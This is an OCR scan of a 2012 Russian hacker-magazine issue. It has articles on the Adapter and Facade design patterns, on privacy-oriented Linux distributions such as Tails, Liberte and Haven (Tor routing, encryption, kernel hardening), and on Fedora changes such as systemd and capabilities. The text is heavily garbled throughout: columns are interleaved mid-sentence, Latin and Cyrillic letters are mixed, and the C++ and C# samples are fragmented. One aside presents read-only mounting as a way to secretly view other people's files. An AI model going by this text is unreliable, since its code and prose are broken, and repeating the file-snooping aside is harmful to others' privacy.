I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

1/ .. .

и нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

1

+request!l

r_

1

Adaptee -> specificReqest []

1

ADAPTER

1

+request(]

1------

-

«ad aptee»

.. ADAPTEE

specificReqest 11

Д и аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 2012

101


КОДИНГ

// Преобразуем вектор в массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, так как мы наследуем метод getНtmlTags (),

};

/1

IJ

vectorOfTags = getHtmlTags();

Jl

то можно вызвать его наnрямую

Преобразуем ве к тор в массив

return vector2array(vectorOfTags);

};

Е сли ты регулярно заглядыв аеш ь в рубрику << Кодинг », то, на­

верное, помнишь др угой похожий паттер н, а именно « Де коратор>>.

Jl ...

На первый взгляд действительно может показаться, что по сути эти два шаблона объектно - ориентированного пр ограммирования Конечно, используя наследование вместо композиции, мы теря­

идентичны. Но на самом дел е паттерн «А даптер >> служит для пре­

образования одного ин т ерфейса вызова в другой, в то время как

ем некотор ую гибкость и ограничиваем себя лишь одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, но взамен получаем выигрыш в производительности .

методами поддерживаемых классов.

Если бы программа создавала мн ожес тво объек т ов HTML Adapteг и интенсивно работала с его методами, то, используя адаптер объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, мы бы тратили лишнюю память и теряли время при вызове

Выше мы рассмотрели так называемый а дап тер объектов, ко т орый

его методов и сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

гой сто роны, если бы у на с бы л н екий класс НТМLРагsег 2, который

екта и передачи ему н уж ны х вызовов. Н о есть еще один вид такого

бы также реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер к ла ссов. В отличие от а дапт ера объектов,

nисать для него новый код.

адаптер классов испол ь зует множественное наследова н ие, что

немного у прощает его реализацию и уско ряет работу.

« ФАСАД » Теперь , когда мы хорошо разобрались в паттерне «А даптер >>, можно заняться другим шаблон ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования под названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

мало чем отличается от «А даптера >> . Чтобы в этом убедиться, давай взглянем на код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

11 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

11 Create adapter and place а request Target ~arget = new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

11 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

11 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 1Jп.teLine ( "Called

Target

Requeзt()") ;

11 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee = new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

11 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

11 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример кода nаттерна « Адаnтер» на С#

102

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » и << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

1 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 3. meth odC () ;

стему . <<Фасад>> же инкапсупирует все эти действия в одном своем методе, что сво д ит всю процедуру к вызову одной-единственной функции и тем самым упрощает клиенту жизнь . Е сли прово д ить

'

аналогию с П К , то <<Фаса д >> - это кнопка включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

так же как и HT M L A d a p te г, п ринимае т в каче ­

к любому классу сис т емы на п рямую, на низком уров н е, благода­

стве па р аметров своего конструктора ссылки на объекты. Только,

ря чему сохраняется вся гибкость и мощь этих классо в . О д на-

в отличие от <<Адаптера>>, этих ссылок неско ль ко . Д алее <<Фасад>>

ко, если клиент знает только интерфейс <<Фасада>>, в будущем

определяе т н есколько ме т о д о в , ко т орые обращаются к функциям

мы можем модифицировать систему классов, обслуживаемых

инкапсулиро в анных объекто в . Всё просто и оче н ь похоже на п ат­

Facade,

терн <<А д аптер>> . Н о ц ели у этих д вух ш абло н ов соверше нн о разные.

полезна.

и при этом не менять код клиента . Такая изоляция очень

Если НТ М LР а г sе г п р е д назна ч е н для п ри в е д е н ия од н ого интерфей­ са к другому, то

Facade

у п ро щ ает интерфейс доступа к не которой

ЗАКЛЮЧЕНИЕ

системе классов . В при в еденном выше примере мы инка псулируем

Мы узнали о д вух новых паттернах: <<А д аптере>> и <<Фаса -

сразу несколько объектов, принадлежащих к разным типам и со­

де>>. Первый позволяет безболезненно привести и н терфейс

ставляющих некий набор к л ассов, который служит для выполне ­

одного класса к интерфейсу д руго г о для быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы лучше себе это

клиентского кода к новым компоне н там системы. Ш аблон

п ре д ста в и т ь, д остаточно вс п ом н ить ста р ый д обрый П К с систем­

00- п ро г рамми р ования <<Фаса д >>, очень п охожий н а <<А д а п тер>>,

ным блоком, монитором, коло н ками и прочей периферией. Дл я

служит для совершенно другой цели - у п ро щ ения д оступа

запуска этого компьютера нам нуж н о нажат ь кнопку питания на си­

к определенным интерфейсам.

стемном блоке, включит ь монитор, колонки и т. д., то есть вызвать

множество функций классов, которые вместе образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует еще мно г о разнообраз ­ ных паттернов, о которых я расскажу в будущем. :х:

103


UNIXOID

Евгений Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда речь заходит о создании операционки, способной обеспечить анонимность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, так как

его разработка ведется на ба з е за к рытой модели, из-за чего провести

всесторонний аудит кода невозможно .

Во время каждой

в Сети, безопасность сохраненных на диске

загрузки Наvеп

данных и предоставить прочие средства

« возраст •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

с момента

на удивление плодовитыми на идеи

установки .

и неординарные решения парнями . Эти м

Разработчики не рекомендуют

использовать

разработкам, простым и сложным , гениальным

дистрибутив,

и спорным, и посвящена данная статья.

ДОСТИГ

возраст которого

200 ДНеЙ .

l:iфl!lilillli

д истрибу т и вы о т в злом щ иков , о д но вр еме нн о

М н огие хакеры, считаю щ ие себя эксперта-

п оз в о л я я сохра н ит ь уд обство и п ростоту в ис­

ми в безо п асности всего и в ся, в свое время

п о л ьзова н ии . Ч тобы не за п у та т ь чита т е л я, я

брались за созда н ие п о-нас т оящему защи щ ен ­

разбил э т и т ех н ологии на пять групп :

ны х и предлагающи х п олную аноним н ость ОС.

заплатки , по умолчанию нал о жен н ые на кер ­

которые действи т ельно показали мир у, на что

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся на самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно за щ и щ ают эти

и за п ут ы ван и я т ех, к т о пытает с я е го на й ти .

Защита д а н ны х . Описани е с по с обов , с п о ­

Д есктоп. Н абор д осту п н ы х п риложений, а также методики , п рименяемые для защи т ы

Я д ерные д е л а, а точнеепатчии раз л ичные

Многие из них потер п е л и фиаско , однако не ­

традиционный обзор д ист р иб у ти в о в , а скон ­

зуе мы х дл я обез лич и в а н и я пользов а т е ля

от пос т оронних наблю д ате л ей .

Различные ин т ересн ы е фи ш ки. Итак, окунемся в мир пар а н ои д а л ьной

мо щь ю которых дости г ает с я безопасност ь

секьюрности и рассмот р им сле д ую щ ие д ис­

сохра н е н ной на д иске /флешке и н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

и L ibeгte

ХАКЕР

03/158/20 12


Свобода через изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения на отдельной виртуальной

Чтобы сделать туке по-настоящему безопас­

машине. Смысл такого перегруза заключается

ной ОСью, не обойтись без допиливания ядра,

в тотальном разделении приложений, так что

а точнее, его патчин га для повышения общей

даже если взломщику каким-то чудом удастся

стойкости ОС. Один из традиционных методов,

повысить свои привилегии до суперпользо­

используемых для достижения этой цели,

вателя и за гр узить в ядро свой код, уязвимым

заключается в наложении на ядро патч ей

будеттолько одно приложен и е, так как каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная машина работает под управлени­

от возможных вторжений с помощью множе­

ем собственного ядра. Такой зубодробитель­

ства методов, среди которых запрет перехода

ный способ защиты используется в дистри­

по ссылкам, не принадлежащим пользовате­

бутиве

лю, запрет чтения

была посвящена отдельная статья !« Младенец

dmesg

для всех, кто не име­

ет прав гооt, дополнительные ограничения для

QubesOS,

которому в нашем журнале

с лицом убийцы>>,

][_07_2010].

сhгооt-приложений, запрет чтения

/ргос, рандомизация адресного пространства и стека ядра и многое другое. Мы уже писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

о gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая в октябрьском номере за

ля- это вторая важная особенность лю-

в любой момент можно удалить, в результате

бой безопасной ОС. Многие дистрибутивы,

чего система вернется к исходному послеуста­

предназначенные для анонимизации юзера

новочному состоянию.

2010

год], так что не буду повторяться. Обычно вместе с gгsecuгity в систему

данных пользоват е ля образ растет, но его

устанавливается еще и РаХ, который ограни­

в Сети, обеспечивают ее с помощью спосо-

чивает доступ к страницам памяти процессов

ба, который хирург из известного анекдота

бор инструментов для с оздания зашифрован­

!например, делает сегмент данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов и каталогов . Чаще всего для этого

ным для исполнения], что позволяет защитить

Такие дистрибутивы распространяются в виде

системные процессы от многих ошибок пере­

LiveCD,

который, даже буду чи установленным

Многие системы также включают в себя на ­

исп о льзуется известный инстр у мент ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот подход используется

на флешку, сохраняет все данные пользова­

мер, он входит в Наvеп l www.haven-pгoject . oгg ].

в Libeгte Liпux, который построен на основе

теля на RАМ-диске , уничтожаемом во время

Однако иногда разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают к более изощренным решени-

но слишком топорный .

ям. Дистрибутив Pгivatix включает в себя

Gentoo, уже

включающему

в себя оба патча . Другой подход заключается в использова­

нии системы

SELinux

или АррАгmог совместно

Более интересный вариант состоит вис­ пользовании шифрованного хранилища

инстр у мент шифрования съемных носителей UsbCгyptFoгmat и утилиту для резервного

с двумя упомянутыми ранее патчами !или

на базе ТгuеСгурt или LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

вместо них, но это глупость] . Эти системы

расшифровывается во время загрузки после

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

ют запускать приложения в изолированном

работкам реализовать такую систему очень

окружении, так что сбой !читай взлом] одного

просто, тем более что она в готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], созданный для

из них не повлечет за собой проблем в других.

присутствует в дистрибутивах

работы в локальном окружении, без доступа

Подход с использованием АррАгmог реализо­

и многих других . Она также имеется в дис­

к сети lзадействование LAN/WLAN/Biuetooth

ван в операционке

трибутивах

запрещено]. В его арсенале имеется фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] и Libeгte Linux, причем в последнем

изоляцию приложений друг от друга.

в качестве хранилища используется крипто­

руемый с

ванный образ диска, находящийся в отдель­

шифрование , создавать подписи и генери­

ном каталоге. По мере записи в него личных

ровать ключи с помощью контекстного меню

quantOS,

которая, по за­

Еще более радикальный поход заключается в применении гипервизоров для запуска каж-

Ubuntu,

Fedoгa

собственной разработки для

Nautilus

GnuPG,

интегри­

и позволяющий выполнять

lв Наvеп те же функции выполняет инструмент

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем во время работы !например, настройки приложений, словарь

OpenOffice,

ключи GпuPG

и т. д.]. Всё это работает прозрачно и не требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

вы могут включать в себя вспомогательные инструменты, которые помогают скрывать

и защищать информацию от посторонних. На­

пример, в набор приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], который удаляет метаданные иэ файлов различных форматов

!изображений, документов и т. д.], для того чтобы убрать иэ них любое упоминание об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 1/0 activity on the device has stopped.

торе.

Haven

имеет еще более интересные воз­

можности, например, он позволяет шифровать содержимое буфера обмена в один клик, что можно использовать для быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 2012

малого объема данных [скопировал строку-

105


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

1 ttrrl!w ' w--~

Рабочий стол Haven 05

The Amnesiac lncognito Live System

нажал на значок в трее- вставил в письмо).

машины и может выдать его в случае сбоя или

плане

Менеджер файлов

по недосмотру разработчиков приложения.

всё, что только можно представить , так как их

Nautilus,

входящий в тот

же дистрибутив, оснащен плагином , который

П оэтому в Libeгte

Linu x применяется

другой

Ta ils,

в который разработчики пихают

не смущает большой объем дистрибутива. На­

предназначен для << полного >> удаления файла

подход: все входящие в дистриб утив сетевые

пример, в него входит графический фронт-энд

через контекстное меню. Перед удалением

приложения настраиваются на работу через Тог

для Тог-клиента

файл забивается случайными данными, так что

lприложения, н е умеющие работать с прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, который позволяет запускать/

ни один инструмент восстановления данных

си, запускаются с помощью обертки toгify), а

останавливать Тог-демон, просматривать

не сможет его найти.

брандмауэр запрещает любые исходящие сое ­

количество прошедшего через Тог трафика,

динения. Та кая схема позволяет избежа ть как

мо н иторить состояние д емо на и т. д.

АНОНИМУСЫ ИДУТ

утечки IР-адре са, т ак и установления внешних

Дистрибутив включает в с ебя три расши­

Обеспечение анонимности пребыв ания

соединений в обход Тог. Пр и этом разрешены

рения для браузера Fiгe fox, обеспечиваю щи е

в интернете-третья важная особенность

только с л е д ую щи е типы внешних соединений:

безопасность веб-серфинга: расширение

безопасного дистрибутива. Как и в случае

DНСР-запросы и Тог-соединения судален ­

с защитой данных, некоторые дистрибутивы

ными НТТР IS)-портами;

на веб-странице активный контент вроде

подходят к решению этого вопроса радикаль­

ответы на piпg при ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства в секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

не позволяет выходить в Сеть , в том числе

созда нны е пользователем VРN-соедине н ия;

менять gрg-операции к любым элеме нт ам

посредством

соедине ния , инициированныеспециаль­

веб-страницы, например , подписывать или

ным <<небезопасным браузером», который

зашифровывать выделенный фрагмент текста;

удалена из ядра Liпu x, чт о позволяет пре­

используется для регистрации в точках

расширение НТТР S Eveгywheгe lwww. eff.oгg/

вратить ком пьютер в этакий бастион, который

доступа.

Bluetooth

Remix

вообще

и даже И К-модуля.

Поддержка всего этого хозяйства намеренно

toгbuttoп, ко т орое блокирует содержащийся

Flash

и т. д .; инструмент

можно использовать для спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, в которых из­

П ере дава емые по

DHCP данные

при этом

сильно урезаются, а передача имени хоста,

и

1Pv4LL блокируется.

Ч тобы обеспечит ь

начально предусмотрена в озможность выхода

ARP

в Сеть . В них анонимност ь обеспечивается

приватность работы в локальных и

Wi-Fi-

с помощью всем известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

который пробрасывает соединение через

адресов. В некоторых дистрибутивах они

множество сетевых узло в , так что его концы

дост у пны в виде опции, однако в Lib eгte Liпux

оказываются хорошо спрятаны. В обычной

М АС-адрес генерируется динамически во

ситуации Тог прикидывается стандартным

время загрузки.

WINDOWS При установке на флешку дистрибутив

прокси, на работу с которым следует нас тро ить браузер и др угое ПО . Н о как быть в ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

с таблицей разделов, благодаря которому

ции, когда через Тог необ хо димо пробросить

Е сли говорить о поль зовательском интерфейсе

рядовой пользователь

абсолютно вс е сое динения , так чтобы ни о дн о

ди ст ри бутивов для анонимусов, то з десь все

найти систему на брелке. Дистрибутив создает

из них н е утек л о в Сеть обходным путем?

очень пр озаично: с тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

и На vеп решают эту

проблему очень просто: брандмауэр пере­

LXD E или Fluxbox,

набор стандартных прило­

жений вроде Fiгefox,

claws-mail,

AЬiwoгd и т. д.,

100

Windows

не сможет даже

Мб в начале адресного nространства,

а саму ОС и пользовательское пространство

направляет все соединения на Тог-прокси,

плюс джентльменский набор ПО для ведения

размещает в следующих разделах .

исключая любые утечки траф ика в обход

скрытой деятельности . Он-то нас и интересует.

<< не видип> остальные разделы, nозтому

<<анонимной сети». Однако разработчик Libeгte

Н екоторые стандартные приложения для

Windows

nользователю nокажется, что на флешке

Liпu x предупреждает, ч т о такой подход тео­

безопасного времяпрепровождения мы уже

ничего нет, а ее объем составляет

ретически небезопасен, так как , инициируя

рассмотрели в предыдущих разделах, о дн ако

nущей убедительности в этот раздел можно

соединение традиционным п у т ем, приложение

на них список интересных софтин, конечно же,

накидать разных документов, а для отвлечения

получает информацию о внешн ем IР-адресе

не заканчивается . Особенно любпытен в э т ом

внимания- nорнографических картинок.

106

100

ХАКЕР

Мб . Для

03/158/2012


Свобода через изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер на использование протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, если сайт его поддерживает.

Те же расширения идут в комплекте с дис­

NewTab

Back

трибутивом Наvеп, однако его арсенал ими не ограничивается. Здесь ты найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, то есть сайты, с которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет управлять уста­ новкой кукисов в браузер для выбранных

Please refer to the Тог webs~e for

сайтов .

AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет выявлять меж­

сайтовые запросы и управлять ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог и ничего кроме

Некоторые дистрибутивы также включают в себя известный инструмент Аiгсгасk-пg

координаты точки на экране. Все приложения

для исследования Wi-Fi-ceтeй и генераторы

собраны с использованием инструментария

паролей, устойчивых к подбору [например,

Haгdened Geпtoo , предназначенного для сборки

хитры х методов для защиты личны х данных .

PWGeп в Tailsl. Для безопасной переписки с по­

проекта. Этот инструментарий включает та к ие

Один из них- это бл ок ировка экрана с помо­

мощью

патчи, как SSP [защита от переполнен и я с тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

и буфера! и ASLR [рандомизация распределе­ ния памяти!.

Чтобы взломщик не смог обойти блокира-

X-chat

используется расширение

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку через Тог. В арсенале Libeгte Liпux также имеется менед­

не со х раняется!. В L i beгte Liпu x также есть несколько

Но одной блокировки тут явно недостаточно . тор с п о мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

она

запрещена в настройках сервера. На время

жер управления па ролями Figaгo's Passwoгd

В этом разделе я хотел бы рассказать обо всем

лока также отключаются системные Linuх­

Manageг 2 [ l s . гegпet . cz/fpm2 /l , который шифрует

интересном и полезном, что не вошло в пред­

комбинации

все сохраненные пользователем парали с помо­

ыдущие разделы. В основном это различные

но убить Х-сервер или перезагрузить машину.

щью алгоритма

трюки и просто занимательные решения,

Вторая фишка Libeгte- зто так называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, который использует­

заключается в наличии экранной клавиатуры

вов. Одна из интересных особенностей На v еп

ся для регистрации в точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается в том, что он не настраивает сеть

работает под управлением выделенного

ется для обхода кейлогерров, внедренных

автоматически. Предполагается, что если

пользователя, имеющего минимальные права

в ядро или в какие-либо библиотеки времени

пользователю сеть не нужна, то лучше полно­

доступа, а также имеет собственные правила

AES-256 . Интересная

особен­

ность почти всех безопасных дистрибутивов

SysRq,

с помощью которых мож­

исполнения . Фишка тут в том, что, в отличие

стью избавить его от всех возможных проблем.

в iptaЫes, разрешающие коннекты только

от хардварной клавиатуры, нажатия клавиш

После того как пользователь убедится в рабо­

на определенные порты веб-регистрации.

которой перехватить проще простого, экран­

тоспособности демона Тог, статус которого ука­

ная клавиатура управляется мышью, которую

зывает значок в трее, он сможет самостоятель­

бесполезно перехватывать- получишь только

но запустить сеть [то бишь NetwoгkManageгl

кого диска и памяти во время установки или

с помощью меню Applicatioпs

завершения работы. Например, устройство,

Вторая занятная вещь в -

V1daL 1a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 201 2

Hide

Tor

на которое происходит установка, полностью

чие полностью работоспособного комплекса

зачищается путем забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox и демона Тог! для Windows. Ты в лю-

для того, чтобы убрать следы предыдущей

бой момент можешь скопировать его в так

установки или навсегда затереть конфиденци­

называемый обманный раздел флешки [про него читай во врезке! с помощью одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные данные . Для защиты от атак типа

Toolsl, передать флешку другу, и он тоже станет анонимусом. Haven легко установить на другую

памяти сохраняется еще несколько секунд/

флешку с помощью встроенного инсталлятора.

выключением.

нулями или случайными данными. Это нужно

Cold boot, возможных благодаря тому, что после выключения ком па информация в оперативной минут, память полностью затирается перед

Просто воткни брелок в свободный USВ-порт, выбери в меню пункт

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, и дистрибутив скопируется

Собственно, на этом можно и закончить. Мы

на флешку. Естественно, без твоих личных

рассмотрели большинство технологий, ис­

настроек и данных. Кстати, по дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют несколько методов зачистки жест­

Haven

пользуемых в дистрибутивах для анонимусов .

подключает все съемные носители в режиме

Теперь тебе решать- установить какой-либо

<<только чтение>>, что позволяет незаметно

из описанных в статье дистрибутивов или при­

просматривать чужие файлы [время доступа

менить отдельные методики на своем компе. ::х::

107


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П о с ледние верс ии д и стр и бут и ва Fedo г a выделяютс я неск о л ь кими и нтересными и да ж е и н н ова ци онным и

изм е н е ни ям и . Fedoгa

Syste md,

в Fedoгa

14 переш л а на с и стему и н и циал и зации 15 SETUID-б ит в приложениях з амен е н

т ехнолог и е й CapaЬil i t i es , в шес тн адцато м рел и зе о суще с твлен переход на загрузчик

HAL.

GRUB2

и убрана система

Разработчики также приняли решен и е в будуще м

пере с мотр е ть струк т уру катало г ов, которая почти не менялась

со времен

UNIX. Ра бочи й стол

a..W.il!l$1•1

В конце концов терпение разработчиков

С т андартная с и с тема ини ц иализации

лопну л о , и они создали систему инициализа ­

до с тавшаяся «пингвину » в

ции

SysV, наследство от UNIX,

Systemd, которая

решила все проблемы

Fedora на основе Gnome 3

-и всё, система в опаснос т и . А всё потому, что

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны только д ля того , чт о бы

всегда обладала недостатком, порожденным

разом . Она стала контролировать последова­

создавать сырые IRAWI со кеты . И не важно , что

ее же простотой . Она позволяла запускать

тельность запуска сервисов и и х исполнение

piпg всеми средствами пытается ограничить

набор системных сервисов во время загрузки

и даже позволила отказаться от громоздких

время использования повышенных прав, ве­

и завершать их во время шатдауна, но не имела

скриптов, предоставив встроенные средства

роятно с ть ошибки- штука непредсказуемая ,

никакихсредств д ля а д еква т но г оконтроля

для подготовки сервисов к запуску. При этом

тем более что опасность несет не только piпg,

их исполнения. В результате разработчикам

первых двух целей уд алось достичь весь -

но и

прихо д илось и д ти на различ н ые ухищрения ,

ма ори г иналь н ым и о д новременно п ростым

сложных и жадных до гооt- п рав. Как снизить

ч тобы учесть после д овател ь нос т ь за п уска

с п особом, а име нн о п у т ем заб л аго в реме нн о г о

риски в этой ситуа ц ии? Ис п о л ьзоват ь S EL iпux?

этих самых сервисов , о пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно с уче т ом т о г о, ч т о

ОС и контролирова т ь ис п о лн е н ие демонов,

Systemd

во ш ла в F edoгa

14

в качес т ве

ftp

и куча других софтин, гораздо более

многие пользователи не понимают и имеют

которые имеют свойство п ерио д ически п адать

опции, но уже к сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а не х ватки ресурсов, ОоS-атак и ошибок

лась в ста нд ар т ную систему запуска/контроля

не имеющим прав гооt, создавать RАW-сокеты

в коде . Появилась разрозне н ная сеть сложных

сервисов. Е е под д ержка была еще больше рас­

и привилегированные порты? Е ще большая

ширена в Fedoгa 16lбыли переписаны мно г ие устаревшие скрипты инициализации!.

дыра в безопасности . Ах да , у нас же есть шту­

скриптое инициализации, попутно вызываю­

щи х множе с тво подсобных утилит вроде

gгер ,

awk

cut,

и им подобных. Она очень легко ру­

шилась при малейшей модификации. В общем,

ковина под названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это система

деле­

гирования повышенных прав «по кусочкам » ,

простота породила сложность , которая с года­

Ис п олняемые файлы с SЕ Т UIО-битом- бич

своего рода аналог

ми всё больше росла и мешала .

всех н иксов. Н ай д ут в каком-нибудь piпg д ыру

ко, процесс не полными, а час т и ч ными права ми

108

SETUID,

на д еляющий , одна­

ХАКЕР

03/158/20 12


Федорина счастье

гооt, например, позволяющий создавать RАW­

fedora

1

сокеты или устанавливать привязку к приви­

легированным портам. Благодаря CapaЬilities,

ping'y можно дать права только на создание в нем дыру, он не получит ничего, кроме

.. . да,

права на создание RАW-сокетов. Какая досада, не правда ли?· Первоначально механизм CapaЬilities поя­ вился то ли в включен в

HP-UX, то ли в AIX. Он уже давно стандарт POSIX, однако о нем никто

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, и даже если взломщик найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

о ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы в ядре

Linux 2.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

не вспоминал, пока не появилась возможность

управлять привилегиями с помощью атрибутов

1

Fedora на

• ам"

Графический инструмент уnравления Systemd

Установка

разделов или, что еще круче, Ыгf-снапшотов.

к твердотельным накопителям !запись в ФС всегда производится в режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

для реализации в следующих версиях Fedoгa,

привыкшие к миру и сnокойствию и радею­

вание nри записи!, а также имеет встроенную

заключается в реорганизации каталоговой

щие за соблюдение традиций, выеказались

поддержку онлайн-снапшотов, что позволяет

структуры, почти не менявшейся со времен

против этой идеи, подкрепив свои слова тем,

в любой момент создать снимок текущего

UNIX. Эта

что, дескать, есть стандарт

состояния ФС и откатить ее к предыдущему со­

идея состоит в том, чтобы пере­

LSB

и что придет­

местить все исполняемые файлы в /usг/Ьin, отказавшись, таким образом, от каталогов /Ьin, /sЬin, /usг/sЬin, а также от каталога /lib, всё со­

ся договариваться с разработчиками софта

стоянию. В Fedoгa

и другими дистрибутивостроителями, поэтому

грузчик

перспективы реализации описанной идеи пока

ным подходом к формированию меню загрузки

держимое которого планируется nеренести в

еще туманны.

IGRUB сам находитустановленные ОС/ядра

GRUB2,

16

